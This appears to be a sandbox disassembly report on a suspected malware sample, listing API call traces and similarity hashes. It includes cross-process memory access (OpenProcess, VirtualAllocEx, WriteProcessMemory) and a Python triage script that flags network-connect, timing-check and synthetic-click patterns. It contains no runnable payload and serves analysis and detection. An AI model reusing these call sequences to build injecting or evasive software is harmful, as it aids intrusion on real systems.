                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 842720411-0
                                                                • Opcode ID: 68ad9ee6a0a4c29b70aa9c1e6087a822a338b0fd9944fdd9c929f9c22ee95bf3
                                                                • Instruction ID: 0d59d994e4898e298551d231e13edcbcb8e1a74fa07cdb7dd3265f14a02c7610
                                                                • Opcode Fuzzy Hash: 68ad9ee6a0a4c29b70aa9c1e6087a822a338b0fd9944fdd9c929f9c22ee95bf3
                                                                • Instruction Fuzzy Hash: 0A018C70701205BFDB164FAADC48DAB3BACEF8A355B114429F806C3260DAB1CC90CBA0
                                                                APIs
                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327A74
                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00327A82
                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00327A8A
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00327A94
                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327AD0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                • String ID:
                                                                • API String ID: 2833360925-0
                                                                • Opcode ID: b27e34f6079b932466671dcce25b1315a324dbb948f60960b1d98114068d8018
                                                                • Instruction ID: 096ca87aaaf527860eeee2bdd70c46c8ef60fc1968355ebe2f84ebe1f6f422c9
                                                                • Opcode Fuzzy Hash: b27e34f6079b932466671dcce25b1315a324dbb948f60960b1d98114068d8018
                                                                • Instruction Fuzzy Hash: 56014C31D05629EBCF02AFE9EC49ADDBB7CFF09721F054455E502B2250DBB09654C7A1
                                                                APIs
                                                                • CLSIDFromProgID.OLE32 ref: 00319ADC
                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00319AF7
                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 00319B05
                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00319B15
                                                                • CLSIDFromString.OLE32(?,?), ref: 00319B21
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                • String ID:
                                                                • API String ID: 3897988419-0
                                                                • Opcode ID: eaa5abbebe8c6c6f49d2181c5303901bc97092923f432ec51c89cc280aa67d1a
                                                                • Instruction ID: 00113ac77364bc0b7421683ddcf94eb48f403659bf9b3c8f6d47ea9212fa029c
                                                                • Opcode Fuzzy Hash: eaa5abbebe8c6c6f49d2181c5303901bc97092923f432ec51c89cc280aa67d1a
                                                                • Instruction Fuzzy Hash: C1017C76B00205ABDB164F54EC58B9A7BEDEB4C391F14C025F905D6210D7B0DD809BA0
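The entries above list each function's imported-API sequence with the argument values the disassembler could resolve, but the reader still has to pick out the calls that matter by eye: the AF_INET/SOCK_STREAM socket followed by connect at 00338BD3, the QueryPerformanceCounter pair around Sleep at 00327A74, the WM_LBUTTONDOWN/WM_LBUTTONUP PostMessageW pair at 0031B413, and the call-twice size probe around HeapAlloc at 0031ABD7. The Python script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses these "APIs" blocks into per-function call lists and flags such patterns by API name and argument value. The rule labels, the embedded excerpt (copied from four entries above and trimmed to the lines the parser reads) and the constants decoded in the comments are this example's own assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt: API lines copied from four entries above, trimmed to what the parser needs.
SAMPLE = """\
APIs
• PostMessageW.USER32(?,00000201,00000001), ref: 0031B413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0031B41B
• PostMessageW.USER32(?,00000202,00000000), ref: 0031B429
• Opcode ID: 491c8a0eeda3663741102c8d69a73624ef9ca4e052c7b09e5b112a5701c7ced2
APIs
• Part of subcall function 0033A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0033A84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00338BD3
• connect.WSOCK32(00000000,?,00000010), ref: 00338BFE
• Opcode ID: c10905bcbab237bac92b1037391b041a324ccf671fb71eb6c02b91cbfe691417
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327A74
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00327A82
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00327A8A
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00327A94
• Opcode ID: b27e34f6079b932466671dcce25b1315a324dbb948f60960b1d98114068d8018
APIs
• GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0031ABD7
• GetLastError.KERNEL32(?,0031A69F,?,?,?), ref: 0031ABE1
• HeapAlloc.KERNEL32(00000000,?,0031A69F,?,?,?), ref: 0031ABF7
• GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0031AC0E
• Opcode ID: 68ad9ee6a0a4c29b70aa9c1e6087a822a338b0fd9944fdd9c929f9c22ee95bf3
"""

API_RE = re.compile(  # one "• Name.MODULE(args), ref: ADDR" line, optionally prefixed by a subcall note
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z_]\w*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # raw argument strings; "?" means the value was not resolved statically
    ref: str
    via_subcall: bool  # listed as "Part of subcall function": reached through a callee


@dataclass
class FunctionEntry:
    opcode_id: str = ""
    calls: list = field(default_factory=list)

    def has_call(self, name, arg_index=None, value=None):
        """True if `name` is called (and, if arg_index is given, with that argument value)."""
        return any(c.name == name and (arg_index is None or c.args[arg_index:arg_index + 1] == [value])
                   for c in self.calls)


def parse_entries(text):
    """One FunctionEntry per 'APIs' block; the call list ends at the first non-API line."""
    entries, in_apis = [], False
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":
            entries.append(FunctionEntry())
            in_apis = True
        elif not entries:
            continue
        elif in_apis and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            entries[-1].calls.append(ApiCall(m["name"], m["module"], args, m["ref"],
                                             m["caller"] is not None))
        else:
            in_apis = False
            if line.startswith("• Opcode ID:"):
                entries[-1].opcode_id = line.split(":", 1)[1].strip()
    return entries


def _probe_then_alloc(entry):
    # Size-probe idiom: the same query API twice, the first call only learning the buffer size.
    names = [c.name for c in entry.calls]
    return any(names.count(q) >= 2 for q in ("GetTokenInformation", "GetUserObjectSecurity"))


# (label, required API names, argument constraints as (api, arg index, hex value), extra predicate).
# Decoded constants: AF_INET=2, SOCK_STREAM=1, WM_LBUTTONDOWN=0x201, WM_LBUTTONUP=0x202.
RULES = [
    ("tcp_connect", {"socket", "connect"},
     [("socket", 0, "00000002"), ("socket", 1, "00000001")], None),
    ("timing_around_sleep", {"QueryPerformanceCounter", "Sleep"}, [], None),
    ("synthetic_left_click", {"PostMessageW"},
     [("PostMessageW", 1, "00000201"), ("PostMessageW", 1, "00000202")], None),
    ("size_probe_then_alloc", {"GetLastError", "HeapAlloc"}, [], _probe_then_alloc),
]


def match_rules(entry):
    names = {c.name for c in entry.calls}
    return [label for label, required, constraints, extra in RULES
            if required <= names
            and all(entry.has_call(*c) for c in constraints)
            and (extra is None or extra(entry))]


def triage(text):
    """Map Opcode ID -> matched rule labels for every entry that hit at least one rule."""
    return {e.opcode_id: hits for e in parse_entries(text) if (hits := match_rules(e))}
```

Feed it the text of a whole report section and it returns one dict entry per flagged function, keyed by Opcode ID so hits can be cross-referenced between reports of related samples. A match is a triage hint, not a verdict: the QueryPerformanceCounter/Sleep pair also occurs in an ordinary high-resolution sleep helper, so a flagged function still has to be read, and a rule only fires on arguments the disassembler resolved (a "?" never matches a constant).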
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0031AA79
                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0031AA83
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0031AA92
                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0031AA99
                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0031AAAF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 44706859-0
                                                                • Opcode ID: 2fa25437e771f9846a94b278efabf8ad98fe0d72fd14f4c1a44b4814201345a0
                                                                • Instruction ID: fea5778f801d8cede4ab62d0f5c329915936b88097cafba18401ba84ee2eaea6
                                                                • Opcode Fuzzy Hash: 2fa25437e771f9846a94b278efabf8ad98fe0d72fd14f4c1a44b4814201345a0
                                                                • Instruction Fuzzy Hash: CAF0AF313012046FEB121FA5AC88EB73BACFF4E755F004019F901C7190DBA19C41CA61
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0031AADA
                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0031AAE4
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0031AAF3
                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0031AAFA
                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0031AB10
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 44706859-0
                                                                • Opcode ID: d94c5996681e42ba317fa93e1336a949ce6e35c1437de8c60c21676bca5ca0d9
                                                                • Instruction ID: 41333759ad47afb6fc4d2b32330df8ceaadca741d73cf6dbae834ebee816902c
                                                                • Opcode Fuzzy Hash: d94c5996681e42ba317fa93e1336a949ce6e35c1437de8c60c21676bca5ca0d9
                                                                • Instruction Fuzzy Hash: A1F0C2313052486FEB121FA5FC88EA73BADFF4A755F008029F902C7190CBA19C51CB61
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0031EC94
                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0031ECAB
                                                                • MessageBeep.USER32(00000000), ref: 0031ECC3
                                                                • KillTimer.USER32(?,0000040A), ref: 0031ECDF
                                                                • EndDialog.USER32(?,00000001), ref: 0031ECF9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                • String ID:
                                                                • API String ID: 3741023627-0
                                                                • Opcode ID: 6bbc66244877c87973854614ea798334fb6c0221cb6aa4cd14ef026cc49d4539
                                                                • Instruction ID: db12d256be4d87b7718be9c5cc751f97346d48b9d077ce372adeda4c16889156
                                                                • Opcode Fuzzy Hash: 6bbc66244877c87973854614ea798334fb6c0221cb6aa4cd14ef026cc49d4539
                                                                • Instruction Fuzzy Hash: CD016230A007159BEB265B10DE4EBD6777CBB14B05F014559EA43654E0DBF1A9948B80
                                                                APIs
                                                                • EndPath.GDI32(?), ref: 002FB0BA
                                                                • StrokeAndFillPath.GDI32(?,?,0035E680,00000000,?,?,?), ref: 002FB0D6
                                                                • SelectObject.GDI32(?,00000000), ref: 002FB0E9
                                                                • DeleteObject.GDI32 ref: 002FB0FC
                                                                • StrokePath.GDI32(?), ref: 002FB117
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                • String ID:
                                                                • API String ID: 2625713937-0
                                                                • Opcode ID: 558d85ce460767cac95e92481b5052e455871dc2fc9b01b70df1ea74af1a2926
                                                                • Instruction ID: 88492947c9bbba3b01e40dd70d98833ea58e20a7c80f15873b4670f080a386c5
                                                                • Opcode Fuzzy Hash: 558d85ce460767cac95e92481b5052e455871dc2fc9b01b70df1ea74af1a2926
                                                                • Instruction Fuzzy Hash: 41F0C934510649EFDB239F65EC0D7657B6DA7123A2F088325E929850F0CBB18966DF50
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0032F2DA
                                                                • CoCreateInstance.OLE32(0036DA7C,00000000,00000001,0036D8EC,?), ref: 0032F2F2
                                                                • CoUninitialize.OLE32 ref: 0032F555
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                • String ID: .lnk
                                                                • API String ID: 948891078-24824748
                                                                • Opcode ID: 73fdbce3874383e409f3c87cfe60943abdf3cfebcf1e17158c680cac2251ab14
                                                                • Instruction ID: 850637f1861db9f566bba46030f3fe84a73d80c381a0f966e1a479f7d22ed801
                                                                • Opcode Fuzzy Hash: 73fdbce3874383e409f3c87cfe60943abdf3cfebcf1e17158c680cac2251ab14
                                                                • Instruction Fuzzy Hash: 9AA16D71114201AFD301EFA4C881DAFB7ECEF99704F50492DF25597192DB70EA59CB62
                                                                APIs
                                                                  • Part of subcall function 002E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E53B1,?,?,002E61FF,?,00000000,00000001,00000000), ref: 002E662F
                                                                • CoInitialize.OLE32(00000000), ref: 0032E85D
                                                                • CoCreateInstance.OLE32(0036DA7C,00000000,00000001,0036D8EC,?), ref: 0032E876
                                                                • CoUninitialize.OLE32 ref: 0032E893
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                • String ID: .lnk
                                                                • API String ID: 2126378814-24824748
                                                                • Opcode ID: 0888c6789fbe49e7213f86477f6abd93281de1447fb296a36f3a0dc5ac000c81
                                                                • Instruction ID: d54b20c84dd6bb436130dd0daa14646a6058e492ac81f20579776e97ed1a4c4b
                                                                • Opcode Fuzzy Hash: 0888c6789fbe49e7213f86477f6abd93281de1447fb296a36f3a0dc5ac000c81
                                                                • Instruction Fuzzy Hash: 5EA174356043119FCB11EF15C885D2ABBE5BF88710F058989F99A9B3A2CB31EC85CF91
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 003032ED
                                                                  • Part of subcall function 0030E0D0: __87except.LIBCMT ref: 0030E10B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorHandling__87except__start
                                                                • String ID: pow
                                                                • API String ID: 2905807303-2276729525
                                                                • Opcode ID: ba56d733130abaad92ff5337f15b3ed58d18c2553bdcc6e2fb054d9aa688fce6
                                                                • Instruction ID: 15cff6f3ccee6c5bda7a11b89c0f4e5c410c747c23c9c2c5eed156bb0864f752
                                                                • Opcode Fuzzy Hash: ba56d733130abaad92ff5337f15b3ed58d18c2553bdcc6e2fb054d9aa688fce6
                                                                • Instruction Fuzzy Hash: 4D517835B0B20196CB2B7714C9B237B2BACDB41710F258DA8F4D5862E9DF348ED4DA46
                                                                APIs
                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0037DC50,?,0000000F,0000000C,00000016,0037DC50,?), ref: 00324645
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003246C5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper$__itow__swprintf
                                                                • String ID: REMOVE$THIS
                                                                • API String ID: 3797816924-776492005
                                                                • Opcode ID: 238a3275619e9f970364caaeefe098cb0049deb024eed69686eec806dcb2a5a3
                                                                • Instruction ID: e94b45240406536b0859d890fc5e15065bb44497295c5805813de905cc8fdb9b
                                                                • Opcode Fuzzy Hash: 238a3275619e9f970364caaeefe098cb0049deb024eed69686eec806dcb2a5a3
                                                                • Instruction Fuzzy Hash: 9841A734A002699FCF02DF99D881AAEB7B5FF49304F148069E926AB252D730DD55CF50
                                                                APIs
                                                                  • Part of subcall function 0032430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0031BC08,?,?,00000034,00000800,?,00000034), ref: 00324335
                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0031C1D3
                                                                  • Part of subcall function 003242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0031BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00324300
                                                                  • Part of subcall function 0032422F: GetWindowThreadProcessId.USER32(?,?), ref: 0032425A
                                                                  • Part of subcall function 0032422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0031BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0032426A
                                                                  • Part of subcall function 0032422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0031BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00324280
                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0031C240
                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0031C28D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                • String ID: @
                                                                • API String ID: 4150878124-2766056989
                                                                • Opcode ID: 6fdf4192fe35b3a6dea19214402627b7968f58d842cf41f1bdf4155eff343987
                                                                • Instruction ID: c20d675277601cf8011a4cf9ec0eceab6317e54f4f071e929494973438269323
                                                                • Opcode Fuzzy Hash: 6fdf4192fe35b3a6dea19214402627b7968f58d842cf41f1bdf4155eff343987
                                                                • Instruction Fuzzy Hash: C5414C7690022CAFDB12DFA4DC81AEEB778AF09700F004495FA45BB181DA716E85CB61
                                                                APIs
                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0037DC00,00000000,?,?,?,?), ref: 0034A6D8
                                                                • GetWindowLongW.USER32 ref: 0034A6F5
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0034A705
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Long
                                                                • String ID: SysTreeView32
                                                                • API String ID: 847901565-1698111956
                                                                • Opcode ID: e09be467e39d1fde84ae9df6c1208f30f535be686e58d6dfc925ad69331e89ec
                                                                • Instruction ID: 7df03c5bd20dab968ca98848c0e056a3ee066ab96f5a23b5d47f879bbd031cf4
                                                                • Opcode Fuzzy Hash: e09be467e39d1fde84ae9df6c1208f30f535be686e58d6dfc925ad69331e89ec
                                                                • Instruction Fuzzy Hash: 8131F031240609AFDB228F38CC40BEA7BA9FB49324F264324F975971E0C774AC509B50
                                                                APIs
                                                                • _memset.LIBCMT ref: 00335190
                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003351C6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CrackInternet_memset
                                                                • String ID: |$D3
                                                                • API String ID: 1413715105-592423575
                                                                • Opcode ID: b087a8a4aa1c8d9d9655e07daa70dee9c628cd87ab05fc28ef3de2d7c3f3bf40
                                                                • Instruction ID: e04b2470d0f920a292d0ee4c2f1d83fa2f1ae16fd42a704a8b1875a2fc852b9e
                                                                • Opcode Fuzzy Hash: b087a8a4aa1c8d9d9655e07daa70dee9c628cd87ab05fc28ef3de2d7c3f3bf40
                                                                • Instruction Fuzzy Hash: 89311871C10119ABCF01AFE5CC85AEE7FB9FF18700F100019F915A6166DA31A956DBA0

APIs
